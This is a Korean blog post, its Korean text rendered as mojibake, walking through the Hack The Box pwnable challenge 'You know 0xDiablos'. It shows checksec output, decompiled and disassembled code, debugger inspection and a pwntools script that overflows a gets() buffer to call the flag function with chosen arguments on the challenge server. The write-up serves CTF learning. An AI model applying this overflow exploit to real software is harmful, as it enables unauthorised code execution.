์ƒ์„ธ ์ปจํ…์ธ 

๋ณธ๋ฌธ ์ œ๋ชฉ

[Hack The Box] Pwnable - You know 0xDiablos

HACK THE BOX

by koharin 2022. 1. 3. 01:45

๋ณธ๋ฌธ

728x90
๋ฐ˜์‘ํ˜•

๐Ÿ’ก CHALLENGE DESCRIPTION

I missed my flag

 

โœ”๏ธ checksec ํ™•์ธ

$ checksec --file=vuln 
[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/koharin/.cache/.pwntools-cache-3.8.
    Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wi:
        [update]
        interval=never
[*] You have the latest version of Pwntools (4.7.0)
[*] '/home/koharin/HackTheBox/You_know_0xDiablos/vuln'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

canary๋„ ์—†๊ณ , ๋ณ„๋‹ค๋ฅธ ๋ณดํ˜ธ๊ธฐ๋ฒ•์ด ์ ์šฉ๋˜์–ด ์žˆ์ง€ ์•Š์€ 32bit ๋ฐ”์ด๋„ˆ๋ฆฌ์ด๋‹ค.

 

 

๐Ÿ” ์ฝ”๋“œ ๋ถ„์„

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __gid_t v3; // ST1C_4

  setvbuf(stdout, 0, 2, 0);
  v3 = getegid();
  setresgid(v3, v3, v3);
  puts("You know who are 0xDiablos: ");
  vuln();
  return 0;
}

main ํ•จ์ˆ˜์—์„œ ์ŠคํŠธ๋ง์„ ์ถœ๋ ฅํ•˜๊ณ  vuln ํ•จ์ˆ˜๋ฅผ ํ˜ธ์ถœํ•œ๋‹ค.

int vuln()
{
  char s; // [esp+0h] [ebp-B8h]

  gets(&s);
  return puts(&s);
}

vuln ํ•จ์ˆ˜์—์„œ๋Š” gets ํ•จ์ˆ˜๋กœ ๋ฒ„ํผ s์— ์ž…๋ ฅ๋ฐ›๋Š”๋‹ค.

gets ํ•จ์ˆ˜์˜ ๊ฒฝ์šฐ ์ž…๋ ฅ ๊ธธ์ด๋ฅผ ๊ฒ€์‚ฌํ•˜์ง€ ์•Š์•„ ์˜ค๋ฒ„ํ”Œ๋กœ์šฐ ์ทจ์•ฝ์ ์ด ์กด์žฌํ•œ๋‹ค.

 

char *__cdecl flag(int a1, int a2)
{
  char *result; // eax
  char s; // [esp+Ch] [ebp-4Ch]
  FILE *stream; // [esp+4Ch] [ebp-Ch]

  stream = fopen("flag.txt", (const char *)&unk_804A008);
  if ( !stream )
  {
    puts("Hurry up and try in on server side.");
    exit(0);
  }
  result = fgets(&s, 64, stream);
  if ( a1 == 0xDEADBEEF && a2 == 0xC0DED00D )
    result = (char *)printf(&s);
  return result;
}

flag ํ•จ์ˆ˜๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š”๋ฐ, flag ํ•จ์ˆ˜์˜ ์ธ์ž a1์ด 0xDEADBEEF ๊ทธ๋ฆฌ๊ณ  a2๊ฐ€ 0xC0DED00D์ธ ๊ฒฝ์šฐ์— flag๋ฅผ ์ถœ๋ ฅํ•ด์ค€๋‹ค.

.text:080491E2 flag            proc near
.text:080491E2
.text:080491E2 s               = byte ptr -4Ch
.text:080491E2 stream          = dword ptr -0Ch
.text:080491E2 var_4           = dword ptr -4
.text:080491E2 arg_0           = dword ptr  8
.text:080491E2 arg_4           = dword ptr  0Ch
.text:080491E2
.text:080491E2 ; __unwind {
.text:080491E2                 push    ebp
.text:080491E3                 mov     ebp, esp
.text:080491E5                 push    ebx
.text:080491E6                 sub     esp, 54h
.text:080491E9                 call    __x86_get_pc_thunk_bx
.text:080491EE                 add     ebx, 2E12h
.text:080491F4                 sub     esp, 8
.text:080491F7                 lea     eax, (unk_804A008 - 804C000h)[ebx]
.text:080491FD                 push    eax             ; modes
.text:080491FE                 lea     eax, (aFlagTxt - 804C000h)[ebx] ; "flag.txt"
.text:08049204                 push    eax             ; filename
.text:08049205                 call    _fopen
.text:0804920A                 add     esp, 10h
.text:0804920D                 mov     [ebp+stream], eax
.text:08049210                 cmp     [ebp+stream], 0
.text:08049214                 jnz     short loc_8049232
.text:08049216                 sub     esp, 0Ch
.text:08049219                 lea     eax, (aHurryUpAndTryI - 804C000h)[ebx] ; "Hurry up and try in on server side."
.text:0804921F                 push    eax             ; s
.text:08049220                 call    _puts
.text:08049225                 add     esp, 10h
.text:08049228                 sub     esp, 0Ch
.text:0804922B                 push    0               ; status
.text:0804922D                 call    _exit
.text:08049232 ; ---------------------------------------------------------------------------
.text:08049232
.text:08049232 loc_8049232:                            ; CODE XREF: flag+32↑j
.text:08049232                 sub     esp, 4
.text:08049235                 push    [ebp+stream]    ; stream
.text:08049238                 push    40h             ; n
.text:0804923A                 lea     eax, [ebp+s]
.text:0804923D                 push    eax             ; s
.text:0804923E                 call    _fgets
.text:08049243                 add     esp, 10h
.text:08049246                 cmp     [ebp+arg_0], 0DEADBEEFh
.text:0804924D                 jnz     short loc_8049269
.text:0804924F                 cmp     [ebp+arg_4], 0C0DED00Dh
.text:08049256                 jnz     short loc_804926C
.text:08049258                 sub     esp, 0Ch
.text:0804925B                 lea     eax, [ebp+s]
.text:0804925E                 push    eax             ; format
.text:0804925F                 call    _printf
.text:08049264                 add     esp, 10h
.text:08049267                 jmp     short loc_804926D

์ด๋•Œ flag๋ฅผ ์ถœ๋ ฅํ•ด์ฃผ๋Š” ์กฐ๊ฑด์ด ์žˆ๋Š”๋ฐ, flag ํ•จ์ˆ˜ ์ธ์ž๋กœ 0x8 ์œ„์น˜์— 0xDEADBEEF๋ฅผ, 0xC ์œ„์น˜์— 0xC0DED00D ์ฃผ์–ด์•ผ ํ•œ๋‹ค.

 

์ด ์ •๋ณด๋กœ ์ƒ๊ฐํ•ด๋ณผ ์ˆ˜ ์žˆ๋Š” ์‹œ๋‚˜๋ฆฌ์˜ค๋Š” stack buffer overflow ์ทจ์•ฝ์ ์œผ๋กœ return address๋ฅผ flag ์ฃผ์†Œ๋กœ ๋ฎ๊ณ , flag ์ธ์ž ์กฐ๊ฑด์„ ๋งŒ์กฑํ•ด์„œ ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ค˜์„œ flag๋ฅผ ์ถœ๋ ฅํ•˜๋Š” ๊ฒƒ์ด๋‹ค.

 

 

๐Ÿšฉ Exploit

Exploit Flow

x86์˜ ๊ฒฝ์šฐ x64์™€ ๋‹ค๋ฅด๊ฒŒ stack์—์„œ buffer + SFP + return address ๊ตฌ์กฐ์—์„œ buffer + SFP ์‚ฌ์ด์— dummy ๋ฐ์ดํ„ฐ๊ฐ€ ์กด์žฌํ•  ์ˆ˜ ์žˆ๋‹ค. ๋”ฐ๋ผ์„œ ๋””์ปดํŒŒ์ผ๋Ÿฌ๋กœ ํ™•์ธํ•œ s ๋ฒ„ํผ์˜ 0xB8 ์˜คํ”„์…‹์ด ์ •ํ™•ํ•œ buffer ์˜คํ”„์…‹์ด ์•„๋‹ ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๋””๋ฒ„๊น…์œผ๋กœ stack ๊ตฌ์กฐ๋ฅผ ํ™•์ธํ•ด๋ณธ๋‹ค.

s ๋ฒ„ํผ์— 'A'*0xB8์„ ์ค€ ํ›„ ๋””๋ฒ„๊น…์„ ํ•ด๋ณธ๋‹ค.

pwndbg> search 'AAAA'
[heap]          0x8f471a0 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[...]
[stack]         0xffdae4e0 0x41414141 ('AAAA')
[stack]         0xffdae4e4 0x41414141 ('AAAA')

์Šคํƒ ๋‚ด ๋ฐ์ดํ„ฐ ์œ„์น˜๋ฅผ ํ™•์ธํ•˜๊ณ , ํ•ด๋‹น ์œ„์น˜์—์„œ stack ๊ตฌ์กฐ๋ฅผ ํ™•์ธํ•ด๋ณธ๋‹ค.

(๋ฐ”๋กœ ๋ฐ์ดํ„ฐ๊ฐ€ ๋“ค์–ด๊ฐ„ ์Šคํƒ ์ฃผ์†Œ๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์—†์–ด์„œ search๋ฅผ ์‚ฌ์šฉํ–ˆ๋‹ค.)

 

'A'*0xB8์˜ buffer ๋ฐ์ดํ„ฐ ๋’ค์— SFP 4๋ฐ”์ดํŠธ์™€ return address 4๋ฐ”์ดํŠธ๊ฐ€ ์œ„์น˜ํ•œ๋‹ค.

๋ณ„๋‹ค๋ฅธ dummy ๋ฐ์ดํ„ฐ ์—†์ด buffer(0xB8) + SFP(4) + return address(4) ๊ตฌ์กฐ์ž„์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

 

๊ทธ๋Ÿผ flag ์ฃผ์†Œ๋ฅผ ๊ตฌํ•˜๊ณ  ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ž‘์„ฑํ•˜๋ฉด flag๋ฅผ ๊ตฌํ•  ์ˆ˜ ์žˆ๋‹ค.

$ objdump -d vuln | grep -B3 "flag"
080491e0 <frame_dummy>:
 80491e0:	eb 8e                	jmp    8049170 <register_tm_clones>

080491e2 <flag>:
--
 804920a:	83 c4 10             	add    $0x10,%esp
 804920d:	89 45 f4             	mov    %eax,-0xc(%ebp)
 8049210:	83 7d f4 00          	cmpl   $0x0,-0xc(%ebp)
 8049214:	75 1c                	jne    8049232 <flag+0x50>
--
 804923e:	e8 0d fe ff ff       	call   8049050 <fgets@plt>
 8049243:	83 c4 10             	add    $0x10,%esp
 8049246:	81 7d 08 ef be ad de 	cmpl   $0xdeadbeef,0x8(%ebp)
 804924d:	75 1a                	jne    8049269 <flag+0x87>
 804924f:	81 7d 0c 0d d0 de c0 	cmpl   $0xc0ded00d,0xc(%ebp)
 8049256:	75 14                	jne    804926c <flag+0x8a>
--
 804925e:	50                   	push   %eax
 804925f:	e8 cc fd ff ff       	call   8049030 <printf@plt>
 8049264:	83 c4 10             	add    $0x10,%esp
 8049267:	eb 04                	jmp    804926d <flag+0x8b>
 8049269:	90                   	nop
 804926a:	eb 01                	jmp    804926d <flag+0x8b>

ASLR์ด ๊ฑธ๋ ค์žˆ์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์— objdump ๋ช…๋ น์–ด๋ฅผ ํ†ตํ•ด flag ์ฃผ์†Œ๋ฅผ ๊ตฌํ•ด์ค€๋‹ค.

flag ์ฃผ์†Œ: 0x080491e2

 

Exploit Code

#!/usr/bin/python 
from pwn import *

context.log_level = 'debug'
#p = process("./vuln")
elf = ELF("./vuln")
p = remote('142.93.40.197', 31743)

flag = elf.symbols['flag']
log.info("flag: " + hex(flag))

pay = 'A'*(0xB8+4)
pay += '\xe2\x91\x04\x08' # 0x80491e2
pay += 'B'*4 # dummy
pay += '\xEF\xBE\xAD\xDE'
pay += '\x0D\xD0\xDE\xC0'

p.sendlineafter(": \n", pay)                                                                                                                                                                               

p.interactive()

buffer + SFP(0xB8+4) + return address(flag) + BBBB(dummy) + DEADBEEF(์ธ์ž, +8 ์œ„์น˜) + C0DED00D(์ธ์ž, +0xC ์œ„์น˜)๋กœ ํŽ˜์ด๋กœ๋“œ๋ฅผ ์ค€๋‹ค.

 

์œ„์˜ exploit code ์‹คํ–‰ ์‹œ flag๋ฅผ ์–ป์„ ์ˆ˜ ์žˆ๋‹ค.

 

728x90
๋ฐ˜์‘ํ˜•

'HACK THE BOX' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[Hack The Box] Machine - Cap  (0) 2021.10.02
[Hack The Box] Web - Templated  (0) 2021.09.11
[Hack The Box] Mobile - Cat  (0) 2021.09.11

๊ด€๋ จ๊ธ€ ๋”๋ณด๊ธฐ